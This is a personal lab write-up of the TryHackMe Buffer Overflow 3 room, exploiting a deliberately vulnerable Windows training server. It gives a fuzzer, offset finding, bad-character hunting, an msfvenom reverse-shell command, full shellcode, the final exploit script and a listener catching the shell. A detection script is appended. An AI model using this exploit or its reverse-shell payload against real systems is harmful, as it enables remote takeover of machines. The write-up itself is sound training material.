u915

Daniel Cano Merchán - Hacking & Tech

Tryhackme Buffer Overflow 3 OSCP style

Third post in the buffer overflow series on TryHackMe: a writeup of Buffer Overflow 3, OSCP style.

Note

Because this post is about practice and repetition, I will go (more) directly to the action and use a simple post structure. These are just personal notes, kept brief.

The first buffer overflow post can be found here:

https://u915.net/posts/2021/06/tryhackme-buffer-overflow-1-oscp-style/

Environment

I used the 32-bit Windows 7 VM with Immunity Debugger inside the TryHackMe room.

Windows Firewall and Defender are disabled.

Connection

Remote connection to the machine:

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.😄 /workarea

Basic test

nc 10.10.😄 1337
Welcome to OSCP Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
OVERFLOW1 [value]
OVERFLOW2 [value]
OVERFLOW3 [value]
OVERFLOW4 [value]
OVERFLOW5 [value]
OVERFLOW6 [value]
OVERFLOW7 [value]
OVERFLOW8 [value]
OVERFLOW9 [value]
OVERFLOW10 [value]
EXIT

Fuzz

Fuzzing the command OVERFLOW3 [value]:

#!/bin/python3

from pwn import *

HOST = "10.10.😄"   # target IP (placeholder kept from the post)
PORT = 1337
LIMIT = 60          # maximum number of rounds
CHARS_FUZZ = 50     # the buffer grows by this many bytes every round

r = remote(HOST, PORT)
print(r.recvline(timeout=1))

for x in range(1, LIMIT):
    print("[+] SENDING " + str(CHARS_FUZZ * x) + " CHARS, COUNTER:" + str(x))
    # pwntools on Python 3 expects bytes, not str
    r.sendline(b"OVERFLOW3 " + b"A" * CHARS_FUZZ * x)
    # a server paused in the debugger after the crash answers nothing: recvline times out with b''
    if r.recvline(timeout=1) == b'':
        print("[!] KO")
        r.close()
        break

Trace

[+] Opening connection to 10.10.:smile; on port 1337: Done
b'Welcome to OSCP Vulnerable Server! Enter HELP for help.\n'
[+] SENDING 50 CHARS, COUNTER:1
[+] SENDING 100 CHARS, COUNTER:2
[+] SENDING 150 CHARS, COUNTER:3
[+] SENDING 200 CHARS, COUNTER:4
[+] SENDING 250 CHARS, COUNTER:5
[+] SENDING 300 CHARS, COUNTER:6
[+] SENDING 350 CHARS, COUNTER:7
[+] SENDING 400 CHARS, COUNTER:8
[+] SENDING 450 CHARS, COUNTER:9
[+] SENDING 500 CHARS, COUNTER:10
[+] SENDING 550 CHARS, COUNTER:11
[+] SENDING 600 CHARS, COUNTER:12
[+] SENDING 650 CHARS, COUNTER:13
[+] SENDING 700 CHARS, COUNTER:14
[+] SENDING 750 CHARS, COUNTER:15
[+] SENDING 800 CHARS, COUNTER:16
[+] SENDING 850 CHARS, COUNTER:17
[+] SENDING 900 CHARS, COUNTER:18
[+] SENDING 950 CHARS, COUNTER:19
[+] SENDING 1000 CHARS, COUNTER:20
[+] SENDING 1050 CHARS, COUNTER:21
[+] SENDING 1100 CHARS, COUNTER:22
[+] SENDING 1150 CHARS, COUNTER:23
[+] SENDING 1200 CHARS, COUNTER:24
[+] SENDING 1250 CHARS, COUNTER:25
[+] SENDING 1300 CHARS, COUNTER:26
[!] KO
[*] Closed connection to 10.10.:smile; port 1337

The server crashes somewhere between 1250 and 1300 characters.

Finding the exact number of chars needed

To find exactly how many characters are needed to reach EIP, I used msf-pattern_create with a 2000-character sample:

msf-pattern_create -l 1300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B

Using nc to send the 2000-character pattern generated:

nc 10.10.:smile; 1337 
Welcome to OSCP Vulnerable Server! Enter HELP for help.
OVERFLOW3 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B

EIP is overwritten with 35714234:

msf-pattern_offset -l 1300 -q 35714234
[*] Exact match at offset 1274

So the exact offset is 1274.
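To make the offset lookup less of a black box, here is a small re-implementation of what msf-pattern_create and msf-pattern_offset do, added as an example (it is not the Metasploit code). It also shows the little-endian packing that the JMP ESP address goes through later in the post.

```python
#!/usr/bin/env python3
"""Added example: re-implementation of msf-pattern_create / msf-pattern_offset
(not the Metasploit code itself)."""
import string
import struct
from itertools import product


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2...Az9Ba0... cut to `length`.
    Every 4-byte window is unique, so the dword that lands in EIP pins its offset."""
    out = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase, string.digits):
        out.append(upper + lower + digit)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]


def eip_to_search_bytes(eip_hex):
    """The debugger shows EIP as a dword (35714234). x86 is little endian, so the
    bytes that overwrote it sit in memory in reverse order: 34 42 71 35 = '4Bq5'."""
    return struct.pack("<I", int(eip_hex, 16)).decode("latin1")


def pattern_offset(eip_hex, length):
    """Offset of the four pattern bytes that landed in EIP, or -1 if not found."""
    return pattern_create(length).find(eip_to_search_bytes(eip_hex))


def to_little_endian(addr):
    """Same conversion, applied to the JMP ESP address before it goes in the payload."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    print(pattern_offset("35714234", 1300))   # 1274, as msf-pattern_offset reported
    print(to_little_endian(0x77041A2B))       # b'+\x1a\x04w'
```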

Finding JMP ESP

/usr/bin/msf-nasm_shell 
nasm > jmp esp
00000000  FFE4              jmp esp

Using mona inside Immunity Debugger to find a JMP ESP address in a module loaded without memory protections (as listed by !mona modules):

!mona modules
!mona find -s "\xff\xe4"

Selected address:

0x77041A2B

To little endian:

77041A2B -> esp = "\x2b\x1a\x04\x77"

Finding bad chars

Mona working directory:

!mona config -set workingfolder C:\Users\admin\Desktop\%p

Set up the byte array, excluding \x00:

!mona bytearray -cpb \x00

Generic byte list, without \x00 (as bytes, which is what pwntools expects on Python 3):

badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

Bad chars script (the offset is the 1274 found above; remove each bad char that !mona compare reports and run it again):

#!/bin/python3

from pwn import *

HOST = "10.10.😄"   # target IP (placeholder kept from the post)
PORT = 1337
offset = 1274       # EIP offset found with msf-pattern_offset
fuzz = b"A" * offset

# Every byte except \x00, which is always excluded. Drop each bad char that
# !mona compare reports, then re-run until the whole array survives on the stack.
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

r = remote(HOST, PORT)
print(r.recvline(timeout=1))

print("[+] SENDING " + str(offset) + " CHARS + BADCHARS")
# BBBB lands in EIP; the byte array follows it on the stack, where ESP points
r.sendline(b"OVERFLOW3 " + fuzz + b"BBBB" + badchars)
if r.recvline(timeout=1) == b'':
    print("[!] KO")
    r.close()

After several compare iterations, the final bad chars are:

!mona bytearray -cpb \x00\x11\x40\x5f\xb8\xee
!mona compare -a 01A1FA30 -f C:\Users\admin\Desktop\oscp\bytearray.bin

The comparison worked. Note: do not forget to update the ESP memory address in each iteration (parameter -a), since the stack address changes between crashes.

Payload

Payload generated with msfvenom, excluding the bad chars found above:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.9.😄 LPORT=4433 -f c -v shellcode -b '\x00\x11\x40\x5f\xb8\xee' EXITFUNC=thread
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with Encoding failed due to a bad character (index=20, char=0xee)
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=275, char=0x11)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with Encoding failed due to a bad character (index=4, char=0xee)
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive succeeded with size 353 (iteration=0)
x86/jmp_call_additive chosen with final size 353
Payload size: 353 bytes
Final size of c file: 1514 bytes

Final script and reverse shell

The final script looks like this:

#!/bin/python3

from pwn import *

HOST = "10.10.😄"   # target IP (placeholder kept from the post)
PORT = 1337
offset = 1274                  # bytes before EIP
esp = b"\x2b\x1a\x04\x77"      # 0x77041A2B, JMP ESP, little endian

nop = b"\x90" * 20             # padding in front of the shellcode

# msfvenom windows/shell_reverse_tcp, encoded with x86/jmp_call_additive
# to avoid the bad chars \x00\x11\x40\x5f\xb8\xee
shellcode = (b"\xfc\xbb\xb3\xc9\xf0\xae\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
b"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x4f\x21\x72\xae\xaf"
b"\xb2\x13\x26\x4a\x83\x13\x5c\x1f\xb4\xa3\x16\x4d\x39\x4f\x7a"
b"\x65\xca\x3d\x53\x8a\x7b\x8b\x85\xa5\x7c\xa0\xf6\xa4\xfe\xbb"
b"\x2a\x06\x3e\x74\x3f\x47\x07\x69\xb2\x15\xd0\xe5\x61\x89\x55"
b"\xb3\xb9\x22\x25\x55\xba\xd7\xfe\x54\xeb\x46\x74\x0f\x2b\x69"
b"\x59\x3b\x62\x71\xbe\x06\x3c\x0a\x74\xfc\xbf\xda\x44\xfd\x6c"
b"\x23\x69\x0c\x6c\x64\x4e\xef\x1b\x9c\xac\x92\x1b\x5b\xce\x48"
b"\xa9\x7f\x68\x1a\x09\x5b\x88\xcf\xcc\x28\x86\xa4\x9b\x76\x8b"
b"\x3b\x4f\x0d\xb7\xb0\x6e\xc1\x31\x82\x54\xc5\x1a\x50\xf4\x5c"
b"\xc7\x37\x09\xbe\xa8\xe8\xaf\xb5\x45\xfc\xdd\x94\x01\x31\xec"
b"\x26\xd2\x5d\x67\x55\xe0\xc2\xd3\xf1\x48\x8a\xfd\x06\xae\xa1"
b"\xba\x98\x51\x4a\xbb\xb1\x95\x1e\xeb\xa9\x3c\x1f\x60\x29\xc0"
b"\xca\x27\x79\x6e\xa5\x87\x29\xce\x15\x60\x23\xc1\x4a\x90\x4c"
b"\x0b\xe3\x3b\xb7\xdc\x06\xb5\xb3\xbc\x7f\xc7\xbb\xad\x2e\x4e"
b"\x5d\xa7\xc0\x06\xf6\x50\x78\x03\x8c\xc1\x85\x99\xe9\xc2\x0e"
b"\x2e\x0e\x8c\xe6\x5b\x1c\x79\x07\x16\x7e\x2c\x18\x8c\x16\xb2"
b"\x8b\x4b\xe6\xbd\xb7\xc3\xb1\xea\x06\x1a\x57\x07\x30\xb4\x45"
b"\xda\xa4\xff\xcd\x01\x15\x01\xcc\xc4\x21\x25\xde\x10\xa9\x61"
b"\x8a\xcc\xfc\x3f\x64\xab\x56\x8e\xde\x65\x04\x58\xb6\xf0\x66"
b"\x5b\xc0\xfc\xa2\x2d\x2c\x4c\x1b\x68\x53\x61\xcb\x7c\x2c\x9f"
b"\x6b\x82\xe7\x1b\x8b\x61\x2d\x56\x24\x3c\xa4\xdb\x29\xbf\x13"
b"\x1f\x54\x3c\x91\xe0\xa3\x5c\xd0\xe5\xe8\xda\x09\x94\x61\x8f"
b"\x2d\x0b\x81\x9a\x2d\xab\x7d\x25")

r = remote(HOST, PORT)
print(r.recvline(timeout=1))

print("[+] SENDING PAYLOAD")
# junk up to EIP, JMP ESP address, NOP padding, then the shellcode at ESP
payload = b"A" * offset + esp + nop + shellcode
r.sendline(b"OVERFLOW3 " + payload)

if r.recvline(timeout=1) == b'':
    print("[!] KO")
    r.close()

There are 20 NOP (\x90) instructions in front of the shellcode as padding, so that the write operations of the encoded payload (the decoder stub unpacking itself near ESP) do not overwrite the shellcode.

Finally, set up an nc listener and trigger the buffer overflow:

nc -lvp 4433
listening on [any] 4433 ...
10.10.:smile;: inverse host lookup failed: Unknown host
connect to [10.9.😄] from (UNKNOWN) [10.10.:smile;] 49260
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin
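From the defender's side, the request that produced that shell is easy to tell apart from a normal OVERFLOW3 command. This added example (not part of the writeup) triages request lines using the command grammar from the HELP output; the thresholds and the sample requests are constructed assumptions, not room data.

```python
#!/usr/bin/env python3
"""Added example: defender-side triage of requests to the OSCP vulnerable
server. Command grammar follows the HELP output; thresholds and samples are
constructed assumptions."""
import re

CMD = re.compile(rb"^(OVERFLOW(?:10|[1-9])) (.*)$", re.DOTALL)
NOP_SLED = re.compile(rb"\x90{8,}")   # eight or more consecutive NOPs
MAX_ARG = 1024                         # assumption: no legitimate argument is this long


def inspect_command(raw):
    """Return a list of findings for one request line (bytes, newline stripped)."""
    findings = []
    m = CMD.match(raw)
    if not m:
        return findings                # HELP, EXIT or unparseable input
    cmd, arg = m.group(1).decode(), m.group(2)
    if len(arg) > MAX_ARG:
        findings.append(f"{cmd}: oversized argument ({len(arg)} bytes)")
    if NOP_SLED.search(arg):
        findings.append(f"{cmd}: NOP sled present")
    # The protocol is plain text ("Enter HELP for help"), so binary bytes in an
    # argument mean a return address or encoded shellcode, not a value.
    binary = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if binary:
        findings.append(f"{cmd}: {binary} non-printable bytes")
    return findings


# Constructed samples: a benign command and a request shaped like the final
# payload above (junk to EIP, JMP ESP address, NOP pad, first shellcode bytes).
SAMPLES = {
    "benign": b"OVERFLOW3 hello",
    "exploit": (b"OVERFLOW3 " + b"A" * 1274 + b"\x2b\x1a\x04\x77"
                + b"\x90" * 20 + b"\xfc\xbb\xb3\xc9\xf0\xae"),
}


def triage(samples):
    return {name: inspect_command(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, findings in triage(SAMPLES).items():
        print(name, findings or "clean")
```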




Thanks for reading!